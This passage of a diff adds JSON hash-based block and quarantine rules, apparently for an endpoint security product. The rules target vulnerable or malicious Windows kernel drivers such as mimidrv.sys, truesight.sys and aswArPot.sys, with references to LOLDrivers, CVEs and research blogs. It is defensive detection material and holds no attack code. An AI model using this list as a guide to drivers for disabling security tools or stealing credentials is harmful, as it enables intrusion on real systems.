+ "type": "hash",
+ "value": "db68a9cbe22b22cba782592eef76e63e080ee8d30943be6da694701f44b6c33e",
+ "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d502764-a8b3-5628-b5cf-5bde97eb0555",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470011Z",
+ "creation_date": "2026-03-23T11:45:30.470014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3de9802a0a1f2da67908a69b4face53b2e62d8106d7c8e2f1d4acfd0a0694f26",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d51173b-5a18-53b4-a479-393f09876f42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969699Z",
+ "creation_date": "2026-03-23T11:45:29.969701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "128bf3838267c86c8163f82f087e564814228288702e08b31ec26dc7525159ac",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d5531b0-f5dc-5d00-8186-017b93bd5d38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479133Z",
+ "creation_date": "2026-03-23T11:45:30.479137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038",
+ "comment": "Vulnerable Kernel Driver (aka rtkiow8x64.sys ) [https://www.loldrivers.io/drivers/998ed67c-9c20-46ef-a6ba-abc606b540b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d66d5c6-326e-50b6-a324-0173c22195d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481345Z",
+ "creation_date": "2026-03-23T11:45:30.481349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481364Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e26a21e1b79ecaee7033e05edb0bd72aca463c23bd6fdf5835916ce2dfdf1a63",
+ "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d74c0fa-f4c0-5dbc-9d5b-be832bbccafb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825906Z",
+ "creation_date": "2026-03-23T11:45:31.825908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e54dd3504b5793374e6a86f6e3bca9cc65adc933966650228bc85aadb4f62db3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d76d0e1-a4a7-57c8-979f-3e67cbe165ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610811Z",
+ "creation_date": "2026-03-23T11:45:29.610813Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610818Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "deecbcd260849178de421d8e2f177dce5c63cf67a48abb23a0e3cf3aa3e00578",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d7d47dc-f469-5ba6-ba98-14f33c00f5c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150858Z",
+ "creation_date": "2026-03-23T11:45:31.150860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "068b16fe0621a588c76f8c3f5d8c60a5508e59deef745823a8678c8f2eace2f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d81f1a6-0b49-5857-873c-7ea236c7621b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833234Z",
+ "creation_date": "2026-03-23T11:45:30.833238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a131c92a1a03f5b8270c022d3a037e27e3ac8e94fef4f03c35b533f2115e7b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2d8ab166-a8df-59f7-ade7-71173e028b12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809135Z",
+ "creation_date": "2026-03-23T11:45:31.809137Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5928478c14a1f50542a9c2e5dbdc6a8419e6c8ae79e3aad1209957cdb53bc136",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2da6c0d3-0eca-5574-89b5-5acf10b6c3b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814363Z",
+ "creation_date": "2026-03-23T11:45:31.814366Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31e47907cb77b4f47b90b1f1d83708970ba9c75003605217e2c5cdadaf01ad9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2daf1f42-7c01-54f7-b8e1-ae81755d50c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819756Z",
+ "creation_date": "2026-03-23T11:45:31.819759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b3e4c6da318fd5a2a0942d19af1acfad48a0bec8a110f9d32c28513841e3f9f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2db32db6-e021-5ff9-be08-f8294763e1e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970582Z",
+ "creation_date": "2026-03-23T11:45:29.970584Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecee4ac0ca126487abd39bd461e160118a33f68466128d695ecfde7eca0c340f",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2dc7ad67-af79-5a5c-84d9-fa2dc9bc7982",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489965Z",
+ "creation_date": "2026-03-23T11:45:31.489968Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489977Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a23f56d5fc0fc9bcaabd5943d042241ceac855257f87e4439637bbd769364954",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2dcb60df-aa07-5992-85de-4fd619d494f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614543Z",
+ "creation_date": "2026-03-23T11:45:29.614545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614550Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2dce5400-3603-5c20-8638-31d53de3e450",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488552Z",
+ "creation_date": "2026-03-23T11:45:31.488554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488559Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cdce30ffc719e709b8de1d4146b700d71994e58cccba28e9a24b657708d5cd2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2dcf9b0d-1640-5cd8-ba9a-ced1bfb15ec8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147168Z",
+ "creation_date": "2026-03-23T11:45:32.147170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e44657710d6e525f6807eb32ae74ba8fa4578574e60bd82774bf4b735adf70eb",
+ "comment": "Malicious Kernel Driver (aka AppvVStram_.sys) [https://securelist.com/honeymyte-kernel-mode-rootkit/118590/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2df56d32-b564-5249-ac26-77f766ee0afc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145290Z",
+ "creation_date": "2026-03-23T11:45:31.145292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145297Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62536485cdd116a9be1d739fc0136e62d33a4d95eda68727166b717f2560ff2a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e1803f1-74a8-5c29-952d-3a079b2969ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819158Z",
+ "creation_date": "2026-03-23T11:45:30.819160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36d8d27d2ee91c45502d3a6688afc5c09b2b9776232074e65bd813a230eb37d1",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e1859bd-abce-5486-bb40-de526449a23c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490297Z",
+ "creation_date": "2026-03-23T11:45:31.490299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490305Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "701e9df3097b53de461ba7a61e5499443e57a0cfe6ead7cd4ebbd1867a8c71e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e22a42c-517a-5762-9d86-6b014106f512",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620295Z",
+ "creation_date": "2026-03-23T11:45:29.620297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620303Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e24b4f7-c09a-52c8-b698-653c0f2547f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492448Z",
+ "creation_date": "2026-03-23T11:45:31.492450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "400c4daae47f29a340154e2e5ebcacce436f0f00067fcb528c9acbe281f5d8ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e3473bf-5c8d-5b96-a585-532d5b7629fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161146Z",
+ "creation_date": "2026-03-23T11:45:31.161148Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161154Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f268e679640e2be2c2f10153fe2bb866a76e63ec7237552377e00121579f3a16",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e624e7f-4d71-5e73-9375-725614d45442",
